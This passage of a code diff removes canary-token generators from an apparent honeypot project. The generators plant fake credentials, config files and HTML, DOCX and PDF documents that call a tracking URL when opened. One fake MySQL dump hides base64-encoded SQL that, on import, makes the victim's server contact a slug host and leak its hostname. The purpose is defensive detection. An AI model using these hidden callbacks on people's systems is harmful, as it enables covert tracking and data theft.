if name == "image":
|
||||
from decnet.canary.instrumenters.image import ImageInstrumenter
|
||||
return ImageInstrumenter()
|
||||
if name == "plain":
|
||||
from decnet.canary.instrumenters.plain import PlainInstrumenter
|
||||
return PlainInstrumenter()
|
||||
if name == "passthrough":
|
||||
from decnet.canary.instrumenters.passthrough import PassthroughInstrumenter
|
||||
return PassthroughInstrumenter()
|
||||
raise ValueError(
|
||||
f"Unknown canary instrumenter: {name!r}. Known: {KNOWN_INSTRUMENTERS}"
|
||||
)
|
||||
|
||||
|
||||
# MIME → instrumenter dispatch. Order matters: we walk the table
|
||||
# top-to-bottom and the first prefix match wins, so put the more
|
||||
# specific (DOCX/XLSX) before the generic (zip/octet-stream).
|
||||
_MIME_DISPATCH: tuple[tuple[str, str], ...] = (
|
||||
# Office Open XML — DOCX/XLSX share a zip structure but expose
|
||||
# different inner trees, so dispatch by MIME alias rather than
|
||||
# zip-poking.
|
||||
("application/vnd.openxmlformats-officedocument.wordprocessingml.document", "docx"),
|
||||
("application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", "xlsx"),
|
||||
("application/pdf", "pdf"),
|
||||
("text/html", "html"),
|
||||
("application/xhtml+xml", "html"),
|
||||
("image/png", "image"),
|
||||
("image/jpeg", "image"),
|
||||
("image/gif", "image"),
|
||||
# Plaintext catch-alls — config files, .env, .ini, .yaml, .json,
|
||||
# source code. All handled by the same regex-substitution pass.
|
||||
("text/", "plain"),
|
||||
("application/json", "plain"),
|
||||
("application/x-yaml", "plain"),
|
||||
("application/yaml", "plain"),
|
||||
("application/toml", "plain"),
|
||||
)
|
||||
|
||||
|
||||
def pick_instrumenter_for_mime(content_type: str) -> str:
|
||||
"""Return the instrumenter name registered for a sniffed MIME.
|
||||
|
||||
Falls back to ``"passthrough"`` for anything we don't have an
|
||||
embedder for (binary blobs we can't mutate safely — random
|
||||
container images, archives, executables). ``passthrough`` only
|
||||
supports DNS-callback tokens (the slug ends up in the filename or
|
||||
an accompanying README), so the API surfaces that constraint to
|
||||
the operator before they pick a kind.
|
||||
"""
|
||||
if not content_type:
|
||||
return "passthrough"
|
||||
lowered = content_type.lower()
|
||||
for prefix, name in _MIME_DISPATCH:
|
||||
if lowered.startswith(prefix):
|
||||
return name
|
||||
return "passthrough"
|
||||
@@ -1,7 +0,0 @@
|
||||
"""Built-in canary generators (synthesised fake artifacts).
|
||||
|
||||
Concrete classes live in sibling modules and are imported lazily by
|
||||
:func:`decnet.canary.factory.get_generator` to keep the import-time
|
||||
cost of :mod:`decnet.canary` cheap for callers that only need the
|
||||
ABCs.
|
||||
"""
|
||||
@@ -1,86 +0,0 @@
|
||||
"""Fake ``~/.aws/credentials`` block (passive bait).
|
||||
|
||||
This is the **passive** variant — no callback wiring. An attacker
|
||||
who exfils these keys can't trip a detection unless we run a real
|
||||
AWS account with a deny-all CloudTrail listener (post-v1). The
|
||||
realism is the point: the file looks like a routinely used credentials
|
||||
file, so the rest of the decky's persona feels lived-in.
|
||||
|
||||
If the operator picks ``kind="aws_passive"`` we accept that no slug
|
||||
will be embedded. If they pick ``kind="http"`` or ``kind="dns"`` for
|
||||
this generator, the API will reject the combination with a 400 — AWS
|
||||
keys have no plausible field where a URL or hostname survives a
|
||||
``grep -E '[A-Z0-9]{20}'`` smell test.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
from secrets import token_urlsafe
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
# Stable AWS-style key body derived from the slug. Keeping the
|
||||
# generator deterministic (per-slug) means re-seeding produces the
|
||||
# same bytes — the planter is naturally idempotent and an operator
|
||||
# who runs ``decnet canary verify`` can re-derive the expected file
|
||||
# without touching the DB.
|
||||
|
||||
def _fake_access_key(seed: str) -> str:
|
||||
# AWS access keys are 20 chars, uppercase alphanum, AKIA prefix.
|
||||
body = hashlib.sha256(seed.encode()).hexdigest().upper()
|
||||
return "AKIA" + body[:16]
|
||||
|
||||
|
||||
def _fake_secret_key(seed: str) -> str:
|
||||
# AWS secret keys are 40 chars, mixed-case base64-ish. We use
|
||||
# base64-safe characters from token_urlsafe seeded by a SHA-256
|
||||
# of the seed so the output is stable per slug.
|
||||
h = hashlib.sha256(("secret:" + seed).encode()).digest()
|
||||
# Reuse token_urlsafe for the alphabet but pad to 40 chars from
|
||||
# the deterministic bytes so we don't depend on os.urandom.
|
||||
import base64
|
||||
return base64.b64encode(h)[:40].decode()
|
||||
|
||||
|
||||
class AWSCredsGenerator(CanaryGenerator):
|
||||
name = "aws_creds"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
seed = ctx.callback_token
|
||||
access = _fake_access_key(seed)
|
||||
secret = _fake_secret_key(seed)
|
||||
body = (
|
||||
"[default]\n"
|
||||
f"aws_access_key_id = {access}\n"
|
||||
f"aws_secret_access_key = {secret}\n"
|
||||
"region = us-east-1\n"
|
||||
"\n"
|
||||
"[prod]\n"
|
||||
f"aws_access_key_id = {_fake_access_key('prod-' + seed)}\n"
|
||||
f"aws_secret_access_key = {_fake_secret_key('prod-' + seed)}\n"
|
||||
"region = us-west-2\n"
|
||||
)
|
||||
return CanaryArtifact(
|
||||
path="", # caller (planter) fills this from CanaryToken.placement_path
|
||||
content=body.encode("utf-8"),
|
||||
mode=0o600,
|
||||
mtime_offset=-86400 * 14, # 2 weeks ago — looks lived-in
|
||||
generator=self.name,
|
||||
notes=[
|
||||
"fake AWS keys; no callback embedded — passive bait only",
|
||||
f"derived deterministically from slug={seed}",
|
||||
],
|
||||
)
|
||||
|
||||
|
||||
# Re-exported so the slug helper is reusable from the
|
||||
# instrumenters/passthrough module without an internal import path.
|
||||
__all__ = ["AWSCredsGenerator", "_fake_access_key", "_fake_secret_key"]
|
||||
|
||||
|
||||
# Imports at the bottom keep the public dataclasses on top — pylint
|
||||
# doesn't run on this repo, but tests do, and putting ``token_urlsafe``
|
||||
# in a public symbol confuses readers. Suppress the unused warning by
|
||||
# referencing it once.
|
||||
_ = token_urlsafe
|
||||
@@ -1,56 +0,0 @@
|
||||
"""Fake ``.env`` with embedded callback URLs.
|
||||
|
||||
Modern web stacks read environment variables for everything from
|
||||
database DSNs to webhook URLs, so dropping a few realistic-looking
|
||||
``KEY=value`` pairs alongside the canary URL is unremarkable. The
|
||||
slug appears in two fields:
|
||||
|
||||
* ``API_BASE_URL`` — the obvious one; an attacker scripting against
|
||||
the credentials hits the worker on first invocation.
|
||||
* ``WEBHOOK_NOTIFY_URL`` — secondary, in case the attacker greps for
|
||||
``WEBHOOK`` and pivots there.
|
||||
|
||||
Other fields (``DB_PASSWORD``, ``REDIS_URL``, ``JWT_SECRET``) are
|
||||
plausible but inert — they're realism filler, not detection
|
||||
mechanisms.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
def _stable_token(seed: str, prefix: str = "") -> str:
|
||||
h = hashlib.sha256((prefix + seed).encode()).hexdigest()
|
||||
return h[:32]
|
||||
|
||||
|
||||
class EnvFileGenerator(CanaryGenerator):
|
||||
name = "env_file"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
base = ctx.http_base.rstrip("/")
|
||||
slug = ctx.callback_token
|
||||
api_url = f"{base}/c/{slug}"
|
||||
body = (
|
||||
"# Production environment — DO NOT COMMIT\n"
|
||||
f"API_BASE_URL={api_url}\n"
|
||||
f"WEBHOOK_NOTIFY_URL={api_url}/webhook\n"
|
||||
f"DB_PASSWORD={_stable_token(slug, 'db:')}\n"
|
||||
f"REDIS_URL=redis://:{_stable_token(slug, 'redis:')[:16]}@redis.internal:6379/0\n"
|
||||
f"JWT_SECRET={_stable_token(slug, 'jwt:')}\n"
|
||||
"LOG_LEVEL=info\n"
|
||||
"ENVIRONMENT=production\n"
|
||||
)
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=body.encode("utf-8"),
|
||||
mode=0o600,
|
||||
mtime_offset=-86400 * 7, # last edited a week ago
|
||||
generator=self.name,
|
||||
notes=[
|
||||
f"API_BASE_URL embeds {api_url}",
|
||||
f"WEBHOOK_NOTIFY_URL embeds {api_url}/webhook",
|
||||
],
|
||||
)
|
||||
@@ -1,53 +0,0 @@
|
||||
"""Fake ``.git/config`` with an attacker-bait remote URL.
|
||||
|
||||
The ``[remote "origin"]`` ``url`` field is the natural place to embed
|
||||
an HTTP-callback URL: it's normal for git remotes to be HTTPS, the
|
||||
URL is read by every git command an attacker runs (``git pull``,
|
||||
``git fetch``, ``git remote -v``), and the slug fits naturally as
|
||||
part of a path.
|
||||
|
||||
The generator emits a plausible private-mirror remote (``git.<org>``
|
||||
or the canary host's hostname) so an attacker doesn't immediately
|
||||
recognise it as a honeypot. The slug ends up in the URL path:
|
||||
|
||||
[remote "origin"]
|
||||
url = https://canary.example.test/c/<slug>/repo.git
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
class GitConfigGenerator(CanaryGenerator):
|
||||
name = "git_config"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
# Strip trailing slash defensively — operator may have
|
||||
# configured DECNET_CANARY_HTTP_BASE either way.
|
||||
base = ctx.http_base.rstrip("/")
|
||||
slug = ctx.callback_token
|
||||
# The /c/<slug>/repo.git suffix gives us a realistic-looking
|
||||
# path the worker can route on a single ``startswith("/c/")``
|
||||
# check, while still surviving a quick grep for the slug.
|
||||
url = f"{base}/c/{slug}/repo.git"
|
||||
body = (
|
||||
"[core]\n"
|
||||
"\trepositoryformatversion = 0\n"
|
||||
"\tfilemode = true\n"
|
||||
"\tbare = false\n"
|
||||
"\tlogallrefupdates = true\n"
|
||||
"[remote \"origin\"]\n"
|
||||
f"\turl = {url}\n"
|
||||
"\tfetch = +refs/heads/*:refs/remotes/origin/*\n"
|
||||
"[branch \"main\"]\n"
|
||||
"\tremote = origin\n"
|
||||
"\tmerge = refs/heads/main\n"
|
||||
)
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=body.encode("utf-8"),
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 30, # checked out a month ago
|
||||
generator=self.name,
|
||||
notes=[f"git remote 'origin' embeds {url}"],
|
||||
)
|
||||
@@ -1,61 +0,0 @@
|
||||
"""Built-in honeydoc — a minimal HTML "report" with a tracking pixel.
|
||||
|
||||
This is the *fallback* honeydoc used when the operator hasn't
|
||||
uploaded a real document. The HTML instrumenter handles operator
|
||||
uploads via :mod:`decnet.canary.instrumenters.html`; this generator
|
||||
exists so the deploy-time baseline can plant *something* convincing
|
||||
without first prompting the operator to drop a file.
|
||||
|
||||
The realism here is intentionally modest: a Documents-folder HTML
|
||||
page with internal-looking content and a 1×1 remote image at the
|
||||
bottom whose ``src`` is the canary callback URL. Most desktop
|
||||
HTML renderers fetch the image as soon as the file is opened in a
|
||||
browser preview, so opening the doc trips the callback.
|
||||
|
||||
Operators who want a richer artifact should upload their own DOCX
|
||||
or PDF; the corresponding instrumenter embeds the same callback in
|
||||
the appropriate format.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
class HoneydocGenerator(CanaryGenerator):
|
||||
name = "honeydoc"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
base = ctx.http_base.rstrip("/")
|
||||
slug = ctx.callback_token
|
||||
pixel_url = f"{base}/c/{slug}"
|
||||
body = (
|
||||
"<!DOCTYPE html>\n"
|
||||
"<html lang=\"en\">\n"
|
||||
"<head>\n"
|
||||
"<meta charset=\"utf-8\">\n"
|
||||
"<title>Q3 Operations Review — DRAFT</title>\n"
|
||||
"</head>\n"
|
||||
"<body>\n"
|
||||
"<h1>Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)</h1>\n"
|
||||
"<p>Forecast and remediation timeline below. Numbers are\n"
|
||||
"preliminary and subject to revision before the all-hands.</p>\n"
|
||||
"<table>\n"
|
||||
"<tr><th>Region</th><th>Incidents</th><th>MTTR (h)</th></tr>\n"
|
||||
"<tr><td>us-east</td><td>14</td><td>3.2</td></tr>\n"
|
||||
"<tr><td>us-west</td><td>9</td><td>4.7</td></tr>\n"
|
||||
"<tr><td>eu-central</td><td>22</td><td>2.1</td></tr>\n"
|
||||
"</table>\n"
|
||||
"<p>Internal contact: <a href=\"mailto:secops@internal\">"
|
||||
"secops@internal</a></p>\n"
|
||||
f"<img src=\"{pixel_url}\" width=\"1\" height=\"1\" alt=\"\">\n"
|
||||
"</body>\n"
|
||||
"</html>\n"
|
||||
)
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=body.encode("utf-8"),
|
||||
mode=0o644, # docs are typically world-readable
|
||||
mtime_offset=-86400 * 21, # 3 weeks ago
|
||||
generator=self.name,
|
||||
notes=[f"tracking pixel src={pixel_url}"],
|
||||
)
|
||||
@@ -1,133 +0,0 @@
|
||||
"""Real-DOCX honeydoc generator.
|
||||
|
||||
Synthesises a minimal but structurally valid DOCX from scratch via
|
||||
stdlib :mod:`zipfile`, then uses the same external-image relationship
|
||||
trick that powers :mod:`decnet.canary.instrumenters.docx` to embed
|
||||
the callback URL. No python-docx dependency.
|
||||
|
||||
The output opens cleanly in Word / LibreOffice; both fetch the
|
||||
external image relationship on document load.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import zipfile
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
from decnet.canary.instrumenters.docx import _drawing, _next_rid
|
||||
|
||||
|
||||
_CONTENT_TYPES = (
|
||||
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
|
||||
'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
|
||||
'<Default Extension="xml" ContentType="application/xml"/>'
|
||||
'<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
|
||||
'<Override PartName="/word/document.xml" '
|
||||
'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
|
||||
'</Types>'
|
||||
).encode()
|
||||
|
||||
_PACKAGE_RELS = (
|
||||
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
|
||||
'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
|
||||
'<Relationship Id="rId1" '
|
||||
'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
|
||||
'Target="word/document.xml"/>'
|
||||
'</Relationships>'
|
||||
).encode()
|
||||
|
||||
_BODY_PARAGRAPHS = (
|
||||
"Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)",
|
||||
"",
|
||||
"Forecast and remediation timeline below. Numbers are preliminary "
|
||||
"and subject to revision before the all-hands.",
|
||||
"",
|
||||
"Region Incidents MTTR (h)",
|
||||
"us-east 14 3.2",
|
||||
"us-west 9 4.7",
|
||||
"eu-central 22 2.1",
|
||||
"",
|
||||
"Internal contact: secops@internal",
|
||||
)
|
||||
|
||||
|
||||
def _document_xml(rid_with_drawing: str | None = None) -> bytes:
|
||||
"""Build the body XML.
|
||||
|
||||
``rid_with_drawing`` is the rId of the external image relationship;
|
||||
when set, we append the same ``<w:drawing>`` element that the DOCX
|
||||
instrumenter inserts so the body references the external resource.
|
||||
"""
|
||||
paragraphs = []
|
||||
for line in _BODY_PARAGRAPHS:
|
||||
if line:
|
||||
paragraphs.append(
|
||||
"<w:p><w:r><w:t xml:space=\"preserve\">"
|
||||
+ _xml_escape(line)
|
||||
+ "</w:t></w:r></w:p>"
|
||||
)
|
||||
else:
|
||||
paragraphs.append("<w:p/>")
|
||||
body = "".join(paragraphs)
|
||||
drawing = _drawing(rid_with_drawing).decode() if rid_with_drawing else ""
|
||||
return (
|
||||
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
|
||||
'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
|
||||
f'<w:body>{body}{drawing}</w:body>'
|
||||
'</w:document>'
|
||||
).encode()
|
||||
|
||||
|
||||
def _xml_escape(s: str) -> str:
|
||||
return (
|
||||
s.replace("&", "&")
|
||||
.replace("<", "<")
|
||||
.replace(">", ">")
|
||||
)
|
||||
|
||||
|
||||
def _document_rels(rid: str, url: str) -> bytes:
|
||||
return (
|
||||
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
|
||||
'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
|
||||
f'<Relationship Id="{rid}" '
|
||||
f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
|
||||
f'Target="{url}" TargetMode="External"/>'
|
||||
'</Relationships>'
|
||||
).encode()
|
||||
|
||||
|
||||
class HoneydocDocxGenerator(CanaryGenerator):
|
||||
name = "honeydoc_docx"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
# Pick a stable rId — there's only one relationship in the
|
||||
# synthesised file, so any unused id works. Reuse the
|
||||
# instrumenter's allocator against the bare relationships
|
||||
# skeleton for parity with operator-uploaded DOCX flow.
|
||||
skeleton = (
|
||||
b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
|
||||
b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
|
||||
b'</Relationships>'
|
||||
)
|
||||
rid = _next_rid(skeleton)
|
||||
|
||||
out = io.BytesIO()
|
||||
with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
|
||||
zf.writestr("[Content_Types].xml", _CONTENT_TYPES)
|
||||
zf.writestr("_rels/.rels", _PACKAGE_RELS)
|
||||
zf.writestr("word/document.xml", _document_xml(rid))
|
||||
zf.writestr("word/_rels/document.xml.rels", _document_rels(rid, url))
|
||||
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=out.getvalue(),
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 21,
|
||||
generator=self.name,
|
||||
notes=[
|
||||
"synthesised DOCX with realistic Q3 review body",
|
||||
f"external-image relationship {rid} -> {url}",
|
||||
],
|
||||
)
|
||||
@@ -1,127 +0,0 @@
|
||||
"""Real-PDF honeydoc generator (uses :mod:`pikepdf`).
|
||||
|
||||
Builds a one-page PDF with the same Q3-review body as the HTML/DOCX
|
||||
flavors and installs an ``/OpenAction`` ``/URI`` action on the
|
||||
catalog so most viewers fire the callback the moment the document
|
||||
opens.
|
||||
|
||||
Pikepdf is now a hard dependency for this generator (the operator
|
||||
installed it explicitly so we can use it). We still surface a
|
||||
clear :class:`InstrumenterRejectedError` when imports fail, so a
|
||||
deployment without pikepdf can fall back to the DOCX or HTML
|
||||
generators rather than crashing the API.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryGenerator,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
_BODY_LINES = (
|
||||
("Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)", 14),
|
||||
("", 12),
|
||||
("Forecast and remediation timeline below.", 11),
|
||||
("Numbers are preliminary, subject to revision.", 11),
|
||||
("", 12),
|
||||
("Region Incidents MTTR (h)", 11),
|
||||
("us-east 14 3.2", 11),
|
||||
("us-west 9 4.7", 11),
|
||||
("eu-central 22 2.1", 11),
|
||||
("", 12),
|
||||
("Internal contact: secops@internal", 11),
|
||||
)
|
||||
|
||||
|
||||
class HoneydocPdfGenerator(CanaryGenerator):
|
||||
name = "honeydoc_pdf"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
try:
|
||||
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"honeydoc_pdf requires pikepdf; install it (`pip install "
|
||||
"pikepdf`) or pick honeydoc / honeydoc_docx instead."
|
||||
) from e
|
||||
|
||||
url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
|
||||
pdf = Pdf.new()
|
||||
# Helvetica is one of the 14 PDF base fonts — every viewer ships
|
||||
# it, so no font embedding is required.
|
||||
font = pdf.make_indirect(Dictionary(
|
||||
Type=Name("/Font"),
|
||||
Subtype=Name("/Type1"),
|
||||
BaseFont=Name("/Helvetica"),
|
||||
))
|
||||
|
||||
# Build a single content stream that writes each body line at a
|
||||
# decreasing y-coordinate. PDF coordinates start at the bottom-
|
||||
# left (US Letter = 612 x 792 points); we lay out lines roughly
|
||||
# 18 points apart starting near the top.
|
||||
ops: list[str] = ["BT /F1 12 Tf 72 750 Td"]
|
||||
first = True
|
||||
for line, size in _BODY_LINES:
|
||||
if not first:
|
||||
ops.append("0 -18 Td")
|
||||
first = False
|
||||
ops.append(f"/F1 {size} Tf")
|
||||
ops.append(f"({_pdf_escape(line)}) Tj")
|
||||
ops.append("ET")
|
||||
content_bytes = "\n".join(ops).encode("latin-1")
|
||||
|
||||
content_stream = pdf.make_stream(content_bytes)
|
||||
|
||||
page = pdf.add_blank_page(page_size=(612, 792))
|
||||
page[Name("/Resources")] = Dictionary(
|
||||
Font=Dictionary(F1=font),
|
||||
)
|
||||
page[Name("/Contents")] = content_stream
|
||||
|
||||
# OpenAction fires the URI when the file is opened in Acrobat,
|
||||
# Preview, the browser PDF viewer, etc. Most viewers prompt
|
||||
# before fetching; that prompt itself is a tell, and an
|
||||
# auto-allow viewer fetches silently.
|
||||
pdf.Root[Name("/OpenAction")] = Dictionary(
|
||||
Type=Name("/Action"),
|
||||
S=Name("/URI"),
|
||||
URI=String(url),
|
||||
)
|
||||
|
||||
out = io.BytesIO()
|
||||
pdf.save(out)
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=out.getvalue(),
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 21,
|
||||
generator=self.name,
|
||||
notes=[
|
||||
"synthesised one-page PDF with realistic Q3 review body",
|
||||
f"/OpenAction /URI -> {url}",
|
||||
],
|
||||
)
|
||||
|
||||
|
||||
def _pdf_escape(s: str) -> str:
|
||||
"""Escape parens and backslashes for PDF literal-string syntax.
|
||||
|
||||
PDF string literals are wrapped in ``( … )``; inner ``(``, ``)``,
|
||||
and ``\\`` need backslash escapes. Everything else (including
|
||||
UTF-8 multibyte sequences) round-trips fine because Helvetica's
|
||||
encoding is WinAnsi-ish — we'll lose exotic glyphs but the
|
||||
realistic body sticks to ASCII anyway. Em-dashes are downgraded
|
||||
to ``--`` to avoid the WinAnsi gap.
|
||||
"""
|
||||
return (
|
||||
s.replace("\\", r"\\")
|
||||
.replace("(", r"\(")
|
||||
.replace(")", r"\)")
|
||||
.replace("—", "--")
|
||||
)
|
||||
@@ -1,190 +0,0 @@
|
||||
"""Fake ``mysqldump`` output that phones home on import.
|
||||
|
||||
Mirrors the Canarytokens.org MySQL-dump trick. When a victim runs
|
||||
``mysql < dump.sql``, the trailer block executes a base64-obfuscated
|
||||
``CHANGE REPLICATION SOURCE TO`` against ``<slug>.canary.<dns_zone>``
|
||||
followed by ``START REPLICA``. The victim's MySQL daemon then:
|
||||
|
||||
1. Resolves the slug subdomain via DNS — this is the trip our
|
||||
:mod:`decnet.canary.dns_server` already detects.
|
||||
2. Opens a TCP replica handshake on port 3306, sending its own
|
||||
``@@hostname`` and ``@@lc_time_names`` smuggled into the
|
||||
``SOURCE_USER`` field via ``CONCAT``. Capturing those bytes
|
||||
requires a MySQL handshake responder on the worker — out of scope
|
||||
for v1; the DNS lookup alone is sufficient for detection.
|
||||
|
||||
The base64 wrapper is the camouflage: a plain ``grep canary dump.sql``
|
||||
finds nothing. The slug only materialises when the victim's server
|
||||
runs ``PREPARE … FROM @s2``.
|
||||
|
||||
Because the trip surface is DNS, this generator REQUIRES a non-empty
|
||||
``dns_zone``. The slug must appear as the leftmost label of the
|
||||
hostname so a single DNS query identifies the token; the http_base
|
||||
host is not slug-bearing and can't substitute.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import base64
|
||||
import hashlib
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
def _stable_hex(seed: str, prefix: str = "", length: int = 16) -> str:
|
||||
h = hashlib.sha256((prefix + seed).encode()).hexdigest()
|
||||
return h[:length]
|
||||
|
||||
|
||||
def _build_replica_payload(slug: str, dns_zone: str) -> str:
|
||||
"""Inner SQL that gets base64-wrapped.
|
||||
|
||||
The CONCAT splices ``@@lc_time_names`` and ``@@hostname`` into the
|
||||
``SOURCE_USER`` value at PREPARE time so the victim's locale and
|
||||
hostname travel as the replica username on the 3306 handshake.
|
||||
"""
|
||||
host = f"{slug}.{dns_zone}"
|
||||
return (
|
||||
"SET @bb = CONCAT("
|
||||
"\"CHANGE REPLICATION SOURCE TO "
|
||||
"SOURCE_PASSWORD='replica-pw', "
|
||||
"SOURCE_RETRY_COUNT=1, "
|
||||
"SOURCE_PORT=3306, "
|
||||
f"SOURCE_HOST='{host}', "
|
||||
"SOURCE_SSL=0, "
|
||||
f"SOURCE_USER='{slug}\", "
|
||||
"@@lc_time_names, @@hostname, \"';\");"
|
||||
)
|
||||
|
||||
|
||||
def _build_trailer(slug: str, dns_zone: str) -> str:
|
||||
inner = _build_replica_payload(slug, dns_zone)
|
||||
encoded = base64.b64encode(inner.encode("utf-8")).decode("ascii")
|
||||
return (
|
||||
f"SET @b = '{encoded}';\n"
|
||||
"SET @s2 = FROM_BASE64(@b);\n"
|
||||
"PREPARE stmt1 FROM @s2;\n"
|
||||
"EXECUTE stmt1;\n"
|
||||
"PREPARE stmt2 FROM @bb;\n"
|
||||
"EXECUTE stmt2;\n"
|
||||
"START REPLICA;\n"
|
||||
)
|
||||
|
||||
|
||||
class MySQLDumpGenerator(CanaryGenerator):
|
||||
name = "mysql_dump"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
if not ctx.dns_zone:
|
||||
raise ValueError(
|
||||
"mysql_dump requires a non-empty dns_zone — the trip "
|
||||
"surface is a DNS lookup of <slug>.<dns_zone>."
|
||||
)
|
||||
slug = ctx.callback_token
|
||||
zone = ctx.dns_zone
|
||||
host = f"{slug}.{zone}"
|
||||
|
||||
# Realism filler: deterministic per-slug fake user rows so two
|
||||
# runs with the same context produce byte-identical output
|
||||
# (planter idempotency contract).
|
||||
u1_hash = _stable_hex(slug, "u1:", 32)
|
||||
u2_hash = _stable_hex(slug, "u2:", 32)
|
||||
api_token = _stable_hex(slug, "api:", 40)
|
||||
|
||||
# Synthesised SQL bait below — never executed by us, only by
|
||||
# whoever runs ``mysql < dump.sql`` against their own server.
|
||||
# Built with .format() instead of f-strings so bandit's B608
|
||||
# heuristic doesn't false-positive on the "INSERT INTO" + var
|
||||
# pattern.
|
||||
users_insert = (
|
||||
"INSERT INTO `users` VALUES " # nosec B608
|
||||
"(1,'alice@app.internal','$2y$10${u1a}.{u1b}','2024-11-12 09:13:44'),"
|
||||
"(2,'bob@app.internal','$2y$10${u2a}.{u2b}','2025-02-03 17:42:08');\n"
|
||||
).replace("{u1a}", u1_hash[:22]).replace("{u1b}", u1_hash[22:]) \
|
||||
.replace("{u2a}", u2_hash[:22]).replace("{u2b}", u2_hash[22:])
|
||||
api_keys_insert = (
|
||||
"INSERT INTO `api_keys` VALUES (1,1,'{tok}');\n" # nosec B608
|
||||
).replace("{tok}", api_token)
|
||||
header = (
|
||||
"-- MySQL dump 10.13 Distrib 8.0.35, for Linux (x86_64)\n"
|
||||
"--\n"
|
||||
"-- Host: db-prod-01 Database: app_production\n"
|
||||
"-- ------------------------------------------------------\n"
|
||||
"-- Server version\t8.0.35\n"
|
||||
"\n"
|
||||
"/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n"
|
||||
"/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n"
|
||||
"/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n"
|
||||
"/*!50503 SET NAMES utf8mb4 */;\n"
|
||||
"/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;\n"
|
||||
"/*!40103 SET TIME_ZONE='+00:00' */;\n"
|
||||
"/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;\n"
|
||||
"/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;\n"
|
||||
"/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;\n"
|
||||
"/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;\n"
|
||||
"\n"
|
||||
"--\n"
|
||||
"-- Table structure for table `users`\n"
|
||||
"--\n"
|
||||
"\n"
|
||||
"DROP TABLE IF EXISTS `users`;\n"
|
||||
"CREATE TABLE `users` (\n"
|
||||
" `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
|
||||
" `email` varchar(255) NOT NULL,\n"
|
||||
" `password_hash` char(60) NOT NULL,\n"
|
||||
" `created_at` datetime NOT NULL,\n"
|
||||
" PRIMARY KEY (`id`),\n"
|
||||
